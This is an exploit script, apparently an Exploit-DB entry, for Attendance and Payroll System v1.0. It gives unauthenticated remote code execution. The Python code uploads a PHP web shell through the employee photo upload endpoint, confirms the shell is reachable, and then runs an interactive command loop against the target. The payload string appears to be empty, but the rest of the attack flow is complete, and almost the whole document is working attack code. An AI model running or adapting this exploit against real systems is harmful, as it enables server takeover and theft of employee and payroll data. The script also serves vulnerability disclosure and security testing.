# Exploit Title: Attendance and Payroll System v1.0 - Remote Code Execution (RCE) # Date: 04/03/2022 # Exploit Author: pr0z # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip # Version: v1.0 # Tested on: Linux, MySQL, Apache import requests import sys from requests.exceptions import ConnectionError # Interface class to display terminal messages class Interface(): def __init__(self): self.red = '\033[91m' self.green = '\033[92m' self.white = '\033[37m' self.yellow = '\033[93m' self.bold = '\033[1m' self.end = '\033[0m' def header(self): print('\n >> Attendance and Payroll System v1.0') print(' >> Unauthenticated Remote Code Execution') print(' >> By pr0z\n') def info(self, message): print(f"[{self.white}*{self.end}] {message}") def warning(self, message): print(f"[{self.yellow}!{self.end}] {message}") def error(self, message): print(f"[{self.red}x{self.end}] {message}") def success(self, message): print(f"[{self.green}✓{self.end}] {self.bold}{message}{self.end}") upload_path = '/apsystem/admin/employee_edit_photo.php' shell_path = '/apsystem/images/shell.php' #proxies = {'http': '', 'https': ''} shell_data = "" multipart_form_data = { 'id': 1, 'upload': (''), } files = {'photo': ('shell.php', shell_data)} output = Interface() output.header() # Check for arguments if len(sys.argv) < 2 or '-h' in sys.argv: output.info("Usage: python3 rce.py") sys.exit() # Upload the shell target = sys.argv[1] output.info(f"Uploading the web shell to {target}") r = requests.post(target + upload_path, files=files, data=multipart_form_data, verify=False) # Validating shell has been uploaded output.info(f"Validating the shell has been uploaded to {target}") r = requests.get(target + shell_path, verify=False) try: r = requests.get(target + shell_path) if r.status_code == 200: output.success('Successfully connected to web shell\n') else: raise Exception except ConnectionError: output.error('We were unable to establish a connection') sys.exit() except: output.error('Something unexpected happened') sys.exit() # Remote code execution while True: try: cmd = input("\033[91mRCE\033[0m > ") if cmd == 'exit': raise KeyboardInterrupt r = requests.get(target + shell_path + "?cmd=" + cmd, verify=False) if r.status_code == 200: print(r.text) else: raise Exception except KeyboardInterrupt: sys.exit() except ConnectionError: output.error('We lost our connection to the web shell') sys.exit() except: output.error('Something unexpected happened') sys.exit()